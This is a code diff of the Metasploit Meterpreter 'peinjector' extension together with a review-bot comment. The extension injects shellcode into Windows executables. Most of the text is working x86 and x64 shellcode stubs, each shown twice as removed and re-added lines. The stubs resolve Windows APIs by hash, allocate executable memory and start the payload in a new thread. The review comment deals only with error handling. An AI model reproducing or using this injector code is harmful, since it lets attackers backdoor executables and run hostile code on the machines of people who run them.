'ror edi, 0xd', 'add edi, 
eax', 'dec ecx', 'jnz 0xfffffffb', 'push edx', 'nop', 'push edi', 'invalid'] - "\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" + # AUTOMATED ASM: x86 = ['push edx', 'adc [eax+0x13c428b], dl', 'rcl byte [eax-0x1487bf75], 1', 'pop es', 'invalid'] - "\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" + # AUTOMATED ASM: x86 = ['inc edx', 'add al, 0x85', 'jl 0x3f', 'test eax, eax', 'jz 0x75', 'nop', 'add eax, edx'] - "\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" + # AUTOMATED ASM: x86 = ['push eax', 'nop', 'mov ecx, [eax+0x18]', 'mov ebx, [eax+0x20]', 'add ebx, edx', 'jecxz 0x64', 'dec ecx', 'mov esi, [ebx+ecx*4]'] - "\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" + # AUTOMATED ASM: x86 = ['add esi, edx', 'xor edi, edi', 'nop', 'xor eax, eax', 'jmp 0xd', 'jmp far dword [ecx-0x2b]', 'invalid'] - "\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" + # AUTOMATED ASM: x86 = ['or eax, 0xe038c701', 'jmp 0xc', 'jg 0x24', 'shr bl, cl', 'retf 0xe675', 'invalid'] - "\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" + # AUTOMATED ASM: x86 = ['clc', 'cmp edi, [ebp+0x24]', 'jnz 0xffffffda', 'pop eax', 'nop', 'mov ebx, [eax+0x24]', 'add ebx, edx', 'nop', 'invalid'] - "\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" + # AUTOMATED ASM: x86 = ['or al, 0x4b', 'mov ebx, [eax+0x1c]', 'add ebx, edx', 'nop', 'jmp 0xe', 'int 0x97', 'int1', 'mov cl, 0x8b', 'invalid'] - "\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" + # AUTOMATED ASM: x86 = ['mov eax, [ecx]', 'rcl byte [eax+0x24244489], 1', 'pop ebx', 'pop ebx', 'popad', 'nop', 'pop ecx', 'pop edx', 'push ecx', 'invalid'] - "\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" + # AUTOMATED ASM: x86 = ['add [edi], ecx', 'jmp eax', 'pop eax', 'nop', 'pop edi', 'pop edx', 'mov edx, [edx]', 'jmp 0xffffff62', 'nop'] - "\x5D\x90" + # AUTOMATED ASM: x86 = ['pop ebp', 'nop'] x64 = ['pop rbp', 
'nop'] - "\xBE" # AUTOMATED ASM: x86 = ['invalid'] x64 = ['invalid'] - - thread +=[shellcode.length - 5].pack("V") - - thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" + # AUTOMATED ASM: x86 = ['nop', 'push 0x40', 'nop', 'push 0x1000'] - "\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" + # AUTOMATED ASM: x86 = ['push esi', 'nop', 'push 0x0', 'push 0xe553a458', 'call ebp', 'mov ebx, eax', 'mov edi, eax', 'nop'] - "\x89\xF1" # AUTOMATED ASM: x86 = ['mov ecx, esi'] x64 = ['mov ecx, esi'] - - thread += "\xeb\x44" # <--length of shellcode below # AUTOMATED ASM: x86 = ['jmp 0x46'] - - thread += "\x90\x5e" # AUTOMATED ASM: x86 = ['nop', 'pop esi'] - - thread += "\x90\x90\x90" + # AUTOMATED ASM: x86 = ['nop', 'nop', 'nop'] - "\xF2\xA4" + # AUTOMATED ASM: x86 = ['repne movsb'] - "\xE8\x20\x00\x00" + # AUTOMATED ASM: x86 = ['invalid'] - "\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" + # AUTOMATED ASM: x86 = ['add [ebx+0xa2a1de0], bh', 'nop', 'push 0x9dbd95a6', 'call ebp', 'cmp al, 0x6'] - "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" + # AUTOMATED ASM: x86 = ['jl 0xc', 'cmp bl, 0xe0', 'jnz 0xc', 'mov ebx, 0x6f721347', 'push 0x0', 'push ebx', 'invalid'] - "\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" + # AUTOMATED ASM: x86 = ['aad 0x31', 'rcl byte [eax+0x50], 0x50', 'push ebx', 'push eax', 'push eax', 'push 0x160d6838', 'call ebp'] - "\x58\x58\x90\x61" # AUTOMATED ASM: x86 = ['pop eax', 'pop eax', 'nop', 'popad'] - - thread += "\xe9" # AUTOMATED ASM: x86 = ['invalid'] - - thread += [shellcode.length].pack("V") - return stackpreserve + thread + shellcode - end - - def add_thread_x64(payload) - - stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" + # AUTOMATED ASM: x64 = ['nop', 'push rax', 'push rbx', 'push rcx', 'push rdx', 'push rsi', 'push rdi', 'push rbp', 'push r8'] - "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c" # AUTOMATED ASM: x64 = ['push r9', 'push r10', 'push 
r11', 'push r12', 'push r13', 'push r14', 'push r15', 'pushfq'] - - shellcode = "\xE8\xB8\xFF\xFF\xFF" # AUTOMATED ASM: x64 = ['call 0xffffffffffffffbd'] - - shellcode += payload - - thread = "\x90" + # <--THAT'S A NOP. \o/ # AUTOMATED ASM: x64 = ['nop'] - "\xe8\xc0\x00\x00\x00" + # jmp to allocate # AUTOMATED ASM: x64 = ['call 0xc5'] - # api_call - "\x41\x51" + # push r9 - "\x41\x50" + # push r8 - "\x52" + # push rdx - "\x51" + # push rcx - "\x56" + # push rsi - "\x48\x31\xD2" + # xor rdx,rdx - "\x65\x48\x8B\x52\x60" + # mov rdx,qword ptr gs:[rdx+96] - "\x48\x8B\x52\x18" + # mov rdx,qword ptr [rdx+24] - "\x48\x8B\x52\x20" + # mov rdx,qword ptr[rdx+32] - - # next_mod - "\x48\x8b\x72\x50" + # mov rsi,[rdx+80] - "\x48\x0f\xb7\x4a\x4a" + # movzx rcx,word [rdx+74] - "\x4d\x31\xc9" + # xor r9,r9 - - # loop_modname - "\x48\x31\xc0" + # xor rax,rax - "\xac" + # lodsb - "\x3c\x61" + # cmp al, 61h (a) - "\x7c\x02" + # jl 02h - "\x2c\x20" + # sub al, 0x20 - - # not_lowercase - "\x41\xc1\xc9\x0d" + # ror r9d, 13 - "\x41\x01\xc1" + # add r9d, eax - "\xe2\xed" + # loop until read, back to xor rax, rax - "\x52" + # push rdx ;Save the current position in the module list - "\x41\x51" + # push r9 ; Save the current module hash for later - # ; Proceed to iterate the export address table, - "\x48\x8b\x52\x20" + # mov rdx, [rdx+32] ; Get this modules base address - "\x8b\x42\x3c" + # mov eax, dword [rdx+60] ; Get PE header - "\x48\x01\xd0" + # add rax, rdx ; Add the modules base address - "\x8b\x80\x88\x00\x00\x00" + # mov eax, dword [rax+136] ; Get export tables RVA - "\x48\x85\xc0" + # test rax, rax ; Test if no export address table - "\x74\x67" + # je get_next_mod1 ; If no EAT present, process the nex - "\x48\x01\xd0" + # add rax, rdx ; Add the modules base address - "\x50" + # push rax ; Save the current modules EAT - "\x8b\x48\x18" + # mov ecx, dword [rax+24] ; Get the number of function - "\x44\x8b\x40\x20" + # mov r8d, dword [rax+32] ; Get the rva of the function - 
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address - - # get_next_func: ; - "\xe3\x56" + # jrcxz get_next_mod; When we reach the start of the EAT - "\x48\xff\xc9" + # dec rcx ; Decrement the function name counter - "\x41\x8b\x34\x88" + # mov esi, dword [r8+rcx*4]; Get rva of next module name - "\x48\x01\xd6" + # add rsi, rdx ; Add the modules base address - "\x4d\x31\xc9" + # xor r9, r9 ; Clear r9 which will store the hash - # ; And compare it to the one we wan - # loop_funcname: ; - "\x48\x31\xc0" + # xor rax, rax ; Clear rax - "\xac" + # lodsb ; Read in the next byte of the ASCII funct name - "\x41\xc1\xc9\x0d" + # ror r9d, 13 ; Rotate right our hash value - "\x41\x01\xc1" + # add r9d, eax ; Add the next byte of the name - "\x38\xe0" + # cmp al, ah ; Compare AL to AH (null) - "\x75\xf1" + # jne loop_funcname ; continue - "\x4c\x03\x4c\x24\x08" + # add r9, [rsp+8] ; Add the current module hash - "\x45\x39\xd1" + # cmp r9d, r10d ; Compare the hash - "\x75\xd8" + # jnz get_next_func ; Go compute the next function hash - - "\x58" + # pop rax ; Restore the current modules EAT - "\x44\x8b\x40\x24" + # mov r8d, dword [rax+36] ; Get the ordinal table rva - "\x49\x01\xd0" + # add r8, rdx ; Add the modules base address - "\x66\x41\x8b\x0c\x48" + # mov cx, [r8+2*rcx] ; Get the desired functions ordinal - "\x44\x8b\x40\x1c" + # mov r8d, dword [rax+28] ; Get the funct addr table rva - "\x49\x01\xd0" + # add r8, rdx ; Add the modules base address - "\x41\x8b\x04\x88" + # mov eax, dword [r8+4*rcx]; Get the desired func RVA - "\x48\x01\xd0" + # add rax, rdx ; Add the modules base address - - # finish: - "\x41\x58" + # pop r8 ; Clear off the current modules hash - "\x41\x58" + # pop r8 ;Clear off the curr position in the module list - "\x5E" + # pop rsi ; Restore RSI - "\x59" + # pop rcx ; Restore the 1st parameter - "\x5A" + # pop rdx ; Restore the 2nd parameter - "\x41\x58" + # pop r8 ; Restore the 3rd parameter - "\x41\x59" + # pop r9 ; Restore the 4th parameter - 
"\x41\x5A" + # pop r10 ; pop off the return address - "\x48\x83\xEC\x20" + # sub rsp, 32 ; reserve space for the register params - - "\x41\x52" + # push r10 ; push back the return address - "\xFF\xE0" + # jmp rax ; Jump into the required function - - # get_next_mod: ; - "\x58" + # pop rax ; Pop off the current modules EAT - - # get_next_mod1: ; - "\x41\x59" + # pop r9 ; Pop off the current modules hash - "\x5A" + # pop rdx ; Restore our position in the module list - "\x48\x8B\x12" + # mov rdx, [rdx] ; Get the next module - "\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module - - # allocate - thread += "\x5d" + # pop rbp - "\x49\xc7\xc6" # mov r14, 1abh size of payload... # AUTOMATED ASM: x64 = ['invalid'] - - thread += [shellcode.length - 5].pack("V") - thread += "\x6a\x40" + # push 40h - "\x41\x59" + # pop r9 now 40h - "\x68\x00\x10\x00\x00" + # push 1000h - "\x41\x58" + # pop r8.. now 1000h - "\x4C\x89\xF2" + # mov rdx, r14 - "\x6A\x00" + # push 0 - "\x59" + # pop rcx - "\x68\x58\xa4\x53\xe5" + # push E553a458 - "\x41\x5A" + # pop r10 - "\xff\xd5" + # call rbp - "\x48\x89\xc3" + # mov rbx, rax ; Store allocated address in ebx - "\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address - - - thread += "\x48\xc7\xc1" # AUTOMATED ASM: x86 = ['dec eax', 'invalid'] x64 = ['invalid'] - thread += [shellcode.length - 5].pack("V") - - thread += "\xeb\x43" # AUTOMATED ASM: x86 = ['jmp 0x45'] x64 = ['jmp 0x45'] - - # got_payload: - thread += "\x5e" + # pop rsi ; Prepare ESI with the source - "\xf2\xa4" + # repne movsb ; Copy the payload to RWX memo - "\xe8\x00\x00\x00\x00" + # call set_handler ; Configure error handling - - # set_handler: - "\x48\x31\xC0" + # xor rax,rax - "\x50" + # push rax ; LPDWORD lpThreadId (NULL) - "\x50" + # push rax ; DWORD dwCreationFlags (0) - "\x49\x89\xC1" + # mov r9, rax ; LPVOID lpParameter (NULL) - "\x48\x89\xC2" + # mov rdx, rax ; LPTHREAD_START_ROUTINE (payload) - "\x49\x89\xD8" + # mov r8, rbx ; SIZE_T dwStackSize (0 for 
default) - "\x48\x89\xC1" + # mov rcx, rax ; LPSECURITY_ATTRIBUTES (NULL) - "\x49\xC7\xC2\x38\x68\x0D\x16" + # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread") - "\xFF\xD5" + # call rbp ; Spawn payload thread - "\x48\x83\xC4\x58" + # add rsp, 50 - - # stackrestore - "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" + # AUTOMATED ASM: x64 = ['popfq', 'pop r15', 'pop r14', 'pop r13', 'pop r12', 'pop r11', 'pop r10', 'pop r9'] - "\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58" # AUTOMATED ASM: x64 = ['pop r8', 'pop rbp', 'pop rsp', 'pop rdi', 'pop rsi', 'pop rdx', 'pop rcx', 'pop rbx', 'pop rax'] - - thread += "\xe9" # AUTOMATED ASM: x64 = ['invalid'] - thread += [shellcode.length].pack("V") - - return stackpreserve + thread + shellcode - end - end - end - end - end +module Post +module Meterpreter +module Extensions +module Peinjector + +### +# +# This meterpreter extensions allow to inject a given shellcode into an executable file. +# +### +class Peinjector < Extension + + def self.extension_id + EXTENSION_ID_PEINJECTOR + end + + def initialize(client) + super(client, 'peinjector') + + client.register_extension_aliases( + [ + { + 'name' => 'peinjector', + 'ext' => self + } + ]) + end + + def inject_shellcode(opts = {}) + return nil unless opts[:shellcode] + + request = Packet.create_request(COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE) + request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode]) + request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size]) + request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64]) + request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe]) + + response = client.send_request(request) + + error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT) + raise error_msg if error_msg + return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT) end -end + def add_thread_x86(payload) + stackpreserve = "\x90\x90\x60\x9c" # AUTOMATED ASM: x86 = ['nop', 'nop', 'pushad', 'pushfd'] + shellcode = 
"\xE8\xB7\xFF\xFF\xFF" # AUTOMATED ASM: x86 = ['call 0xffffffbc'] + shellcode += payload + + thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" + # AUTOMATED ASM: x86 = ['cld', 'nop', 'call 0xc8', 'pushad', 'mov ebp, esp', 'xor edx, edx', 'nop', 'invalid'] + "\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" + # AUTOMATED ASM: x86 = ['push edx', 'xor [ebx+0x528b0c52], cl', 'adc al, 0xeb', 'invalid'] + "\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" + # AUTOMATED ASM: x86 = ['inc ecx', 'adc [ebx-0x48f0d78e], cl', 'dec edx', 'xor edi, edi', 'xor eax, eax', 'lodsb', 'cmp al, 0x61'] + "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" + # AUTOMATED ASM: x86 = ['jl 0x4', 'sub al, 0x20', 'ror edi, 0xd', 'add edi, eax', 'dec ecx', 'jnz 0xfffffffb', 'push edx', 'nop', 'push edi', 'invalid'] + "\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" + # AUTOMATED ASM: x86 = ['push edx', 'adc [eax+0x13c428b], dl', 'rcl byte [eax-0x1487bf75], 1', 'pop es', 'invalid'] + "\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" + # AUTOMATED ASM: x86 = ['inc edx', 'add al, 0x85', 'jl 0x3f', 'test eax, eax', 'jz 0x75', 'nop', 'add eax, edx'] + "\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" + # AUTOMATED ASM: x86 = ['push eax', 'nop', 'mov ecx, [eax+0x18]', 'mov ebx, [eax+0x20]', 'add ebx, edx', 'jecxz 0x64', 'dec ecx', 'mov esi, [ebx+ecx*4]'] + "\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" + # AUTOMATED ASM: x86 = ['add esi, edx', 'xor edi, edi', 'nop', 'xor eax, eax', 'jmp 0xd', 'jmp far dword [ecx-0x2b]', 'invalid'] + "\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" + # AUTOMATED ASM: x86 = ['or eax, 0xe038c701', 'jmp 0xc', 'jg 0x24', 'shr bl, cl', 'retf 0xe675', 'invalid'] + "\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" + # AUTOMATED ASM: x86 = ['clc', 'cmp edi, [ebp+0x24]', 'jnz 0xffffffda', 'pop eax', 'nop', 'mov ebx, 
[eax+0x24]', 'add ebx, edx', 'nop', 'invalid'] + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" + # AUTOMATED ASM: x86 = ['or al, 0x4b', 'mov ebx, [eax+0x1c]', 'add ebx, edx', 'nop', 'jmp 0xe', 'int 0x97', 'int1', 'mov cl, 0x8b', 'invalid'] + "\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" + # AUTOMATED ASM: x86 = ['mov eax, [ecx]', 'rcl byte [eax+0x24244489], 1', 'pop ebx', 'pop ebx', 'popad', 'nop', 'pop ecx', 'pop edx', 'push ecx', 'invalid'] + "\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" + # AUTOMATED ASM: x86 = ['add [edi], ecx', 'jmp eax', 'pop eax', 'nop', 'pop edi', 'pop edx', 'mov edx, [edx]', 'jmp 0xffffff62', 'nop'] + "\x5D\x90" + # AUTOMATED ASM: x86 = ['pop ebp', 'nop'] x64 = ['pop rbp', 'nop'] + "\xBE" # AUTOMATED ASM: x86 = ['invalid'] x64 = ['invalid'] + + thread +=[shellcode.length - 5].pack("V") + + thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" + # AUTOMATED ASM: x86 = ['nop', 'push 0x40', 'nop', 'push 0x1000'] + "\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" + # AUTOMATED ASM: x86 = ['push esi', 'nop', 'push 0x0', 'push 0xe553a458', 'call ebp', 'mov ebx, eax', 'mov edi, eax', 'nop'] + "\x89\xF1" # AUTOMATED ASM: x86 = ['mov ecx, esi'] x64 = ['mov ecx, esi'] + + thread += "\xeb\x44" # <--length of shellcode below # AUTOMATED ASM: x86 = ['jmp 0x46'] + + thread += "\x90\x5e" # AUTOMATED ASM: x86 = ['nop', 'pop esi'] + + thread += "\x90\x90\x90" + # AUTOMATED ASM: x86 = ['nop', 'nop', 'nop'] + "\xF2\xA4" + # AUTOMATED ASM: x86 = ['repne movsb'] + "\xE8\x20\x00\x00" + # AUTOMATED ASM: x86 = ['invalid'] + "\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" + # AUTOMATED ASM: x86 = ['add [ebx+0xa2a1de0], bh', 'nop', 'push 0x9dbd95a6', 'call ebp', 'cmp al, 0x6'] + "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" + # AUTOMATED ASM: x86 = ['jl 0xc', 'cmp bl, 0xe0', 'jnz 0xc', 'mov ebx, 0x6f721347', 'push 0x0', 'push ebx', 'invalid'] + 
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" + # AUTOMATED ASM: x86 = ['aad 0x31', 'rcl byte [eax+0x50], 0x50', 'push ebx', 'push eax', 'push eax', 'push 0x160d6838', 'call ebp'] + "\x58\x58\x90\x61" # AUTOMATED ASM: x86 = ['pop eax', 'pop eax', 'nop', 'popad'] + + thread += "\xe9" # AUTOMATED ASM: x86 = ['invalid'] + + thread += [shellcode.length].pack("V") + return stackpreserve + thread + shellcode + end + + def add_thread_x64(payload) + + stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" + # AUTOMATED ASM: x64 = ['nop', 'push rax', 'push rbx', 'push rcx', 'push rdx', 'push rsi', 'push rdi', 'push rbp', 'push r8'] + "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c" # AUTOMATED ASM: x64 = ['push r9', 'push r10', 'push r11', 'push r12', 'push r13', 'push r14', 'push r15', 'pushfq'] + + shellcode = "\xE8\xB8\xFF\xFF\xFF" # AUTOMATED ASM: x64 = ['call 0xffffffffffffffbd'] + + shellcode += payload + + thread = "\x90" + # <--THAT'S A NOP. \o/ # AUTOMATED ASM: x64 = ['nop'] + "\xe8\xc0\x00\x00\x00" + # jmp to allocate # AUTOMATED ASM: x64 = ['call 0xc5'] + # api_call + "\x41\x51" + # push r9 + "\x41\x50" + # push r8 + "\x52" + # push rdx + "\x51" + # push rcx + "\x56" + # push rsi + "\x48\x31\xD2" + # xor rdx,rdx + "\x65\x48\x8B\x52\x60" + # mov rdx,qword ptr gs:[rdx+96] + "\x48\x8B\x52\x18" + # mov rdx,qword ptr [rdx+24] + "\x48\x8B\x52\x20" + # mov rdx,qword ptr[rdx+32] + + # next_mod + "\x48\x8b\x72\x50" + # mov rsi,[rdx+80] + "\x48\x0f\xb7\x4a\x4a" + # movzx rcx,word [rdx+74] + "\x4d\x31\xc9" + # xor r9,r9 + + # loop_modname + "\x48\x31\xc0" + # xor rax,rax + "\xac" + # lodsb + "\x3c\x61" + # cmp al, 61h (a) + "\x7c\x02" + # jl 02h + "\x2c\x20" + # sub al, 0x20 + + # not_lowercase + "\x41\xc1\xc9\x0d" + # ror r9d, 13 + "\x41\x01\xc1" + # add r9d, eax + "\xe2\xed" + # loop until read, back to xor rax, rax + "\x52" + # push rdx ;Save the current position in the module list + "\x41\x51" + # push r9 ; Save the current module 
hash for later + # ; Proceed to iterate the export address table, + "\x48\x8b\x52\x20" + # mov rdx, [rdx+32] ; Get this modules base address + "\x8b\x42\x3c" + # mov eax, dword [rdx+60] ; Get PE header + "\x48\x01\xd0" + # add rax, rdx ; Add the modules base address + "\x8b\x80\x88\x00\x00\x00" + # mov eax, dword [rax+136] ; Get export tables RVA + "\x48\x85\xc0" + # test rax, rax ; Test if no export address table + "\x74\x67" + # je get_next_mod1 ; If no EAT present, process the nex + "\x48\x01\xd0" + # add rax, rdx ; Add the modules base address + "\x50" + # push rax ; Save the current modules EAT + "\x8b\x48\x18" + # mov ecx, dword [rax+24] ; Get the number of function + "\x44\x8b\x40\x20" + # mov r8d, dword [rax+32] ; Get the rva of the function + "\x49\x01\xd0" + # add r8, rdx ; Add the modules base address + + # get_next_func: ; + "\xe3\x56" + # jrcxz get_next_mod; When we reach the start of the EAT + "\x48\xff\xc9" + # dec rcx ; Decrement the function name counter + "\x41\x8b\x34\x88" + # mov esi, dword [r8+rcx*4]; Get rva of next module name + "\x48\x01\xd6" + # add rsi, rdx ; Add the modules base address + "\x4d\x31\xc9" + # xor r9, r9 ; Clear r9 which will store the hash + # ; And compare it to the one we wan + # loop_funcname: ; + "\x48\x31\xc0" + # xor rax, rax ; Clear rax + "\xac" + # lodsb ; Read in the next byte of the ASCII funct name + "\x41\xc1\xc9\x0d" + # ror r9d, 13 ; Rotate right our hash value + "\x41\x01\xc1" + # add r9d, eax ; Add the next byte of the name + "\x38\xe0" + # cmp al, ah ; Compare AL to AH (null) + "\x75\xf1" + # jne loop_funcname ; continue + "\x4c\x03\x4c\x24\x08" + # add r9, [rsp+8] ; Add the current module hash + "\x45\x39\xd1" + # cmp r9d, r10d ; Compare the hash + "\x75\xd8" + # jnz get_next_func ; Go compute the next function hash + + "\x58" + # pop rax ; Restore the current modules EAT + "\x44\x8b\x40\x24" + # mov r8d, dword [rax+36] ; Get the ordinal table rva + "\x49\x01\xd0" + # add r8, rdx ; Add the modules base 
address + "\x66\x41\x8b\x0c\x48" + # mov cx, [r8+2*rcx] ; Get the desired functions ordinal + "\x44\x8b\x40\x1c" + # mov r8d, dword [rax+28] ; Get the funct addr table rva + "\x49\x01\xd0" + # add r8, rdx ; Add the modules base address + "\x41\x8b\x04\x88" + # mov eax, dword [r8+4*rcx]; Get the desired func RVA + "\x48\x01\xd0" + # add rax, rdx ; Add the modules base address + + # finish: + "\x41\x58" + # pop r8 ; Clear off the current modules hash + "\x41\x58" + # pop r8 ;Clear off the curr position in the module list + "\x5E" + # pop rsi ; Restore RSI + "\x59" + # pop rcx ; Restore the 1st parameter + "\x5A" + # pop rdx ; Restore the 2nd parameter + "\x41\x58" + # pop r8 ; Restore the 3rd parameter + "\x41\x59" + # pop r9 ; Restore the 4th parameter + "\x41\x5A" + # pop r10 ; pop off the return address + "\x48\x83\xEC\x20" + # sub rsp, 32 ; reserve space for the register params + + "\x41\x52" + # push r10 ; push back the return address + "\xFF\xE0" + # jmp rax ; Jump into the required function + + # get_next_mod: ; + "\x58" + # pop rax ; Pop off the current modules EAT + + # get_next_mod1: ; + "\x41\x59" + # pop r9 ; Pop off the current modules hash + "\x5A" + # pop rdx ; Restore our position in the module list + "\x48\x8B\x12" + # mov rdx, [rdx] ; Get the next module + "\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module + + # allocate + thread += "\x5d" + # pop rbp + "\x49\xc7\xc6" # mov r14, 1abh size of payload... # AUTOMATED ASM: x64 = ['invalid'] + + thread += [shellcode.length - 5].pack("V") + thread += "\x6a\x40" + # push 40h + "\x41\x59" + # pop r9 now 40h + "\x68\x00\x10\x00\x00" + # push 1000h + "\x41\x58" + # pop r8.. 
now 1000h + "\x4C\x89\xF2" + # mov rdx, r14 + "\x6A\x00" + # push 0 + "\x59" + # pop rcx + "\x68\x58\xa4\x53\xe5" + # push E553a458 + "\x41\x5A" + # pop r10 + "\xff\xd5" + # call rbp + "\x48\x89\xc3" + # mov rbx, rax ; Store allocated address in ebx + "\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address + + + thread += "\x48\xc7\xc1" # AUTOMATED ASM: x86 = ['dec eax', 'invalid'] x64 = ['invalid'] + thread += [shellcode.length - 5].pack("V") + + thread += "\xeb\x43" # AUTOMATED ASM: x86 = ['jmp 0x45'] x64 = ['jmp 0x45'] + + # got_payload: + thread += "\x5e" + # pop rsi ; Prepare ESI with the source + "\xf2\xa4" + # repne movsb ; Copy the payload to RWX memo + "\xe8\x00\x00\x00\x00" + # call set_handler ; Configure error handling + + # set_handler: + "\x48\x31\xC0" + # xor rax,rax + "\x50" + # push rax ; LPDWORD lpThreadId (NULL) + "\x50" + # push rax ; DWORD dwCreationFlags (0) + "\x49\x89\xC1" + # mov r9, rax ; LPVOID lpParameter (NULL) + "\x48\x89\xC2" + # mov rdx, rax ; LPTHREAD_START_ROUTINE (payload) + "\x49\x89\xD8" + # mov r8, rbx ; SIZE_T dwStackSize (0 for default) + "\x48\x89\xC1" + # mov rcx, rax ; LPSECURITY_ATTRIBUTES (NULL) + "\x49\xC7\xC2\x38\x68\x0D\x16" + # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread") + "\xFF\xD5" + # call rbp ; Spawn payload thread + "\x48\x83\xC4\x58" + # add rsp, 50 + + # stackrestore + "\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" + # AUTOMATED ASM: x64 = ['popfq', 'pop r15', 'pop r14', 'pop r13', 'pop r12', 'pop r11', 'pop r10', 'pop r9'] + "\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58" # AUTOMATED ASM: x64 = ['pop r8', 'pop rbp', 'pop rsp', 'pop rdi', 'pop rsi', 'pop rdx', 'pop rcx', 'pop rbx', 'pop rax'] + + thread += "\xe9" # AUTOMATED ASM: x64 = ['invalid'] + thread += [shellcode.length].pack("V") + + return stackpreserve + thread + shellcode + end +end +end +end +end +end +end 
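Review bot: In `inject_shellcode` the final `return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)` can only ever yield nil: the preceding `raise error_msg if error_msg` already raises whenever that TLV carries a value, so the repeated lookup on the next line runs only when it is empty. These lines pre-date the commit and are merely re-indented by this hunk, but since the whole method is being touched it is the moment to settle what the RESULT TLV means; if it carries only an error message, replace the last two lines with `raise error_msg if error_msg` and `response` and say so in a method comment, and if it can also carry a success message the raise condition needs to distinguish the two. `raise error_msg` with a String also produces a bare RuntimeError, so callers cannot rescue an injection failure specifically; raising a `RequestError`-style class, if one is in scope here, would be the more useful interface. `opts[:size]`, `opts[:isx64]` and `opts[:targetpe]` are passed to `add_tlv` without the nil guard that `opts[:shellcode]` gets, which at least deserves a comment stating they are required.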
diff --git a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
index db1a06e1d501b..117d079132b99 100644
--- a/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
@@ -5,12 +5,17 @@ module Meterpreter
 module Extensions
 module Peinjector
-TLV_TYPE_PEINJECTOR_SHELLCODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
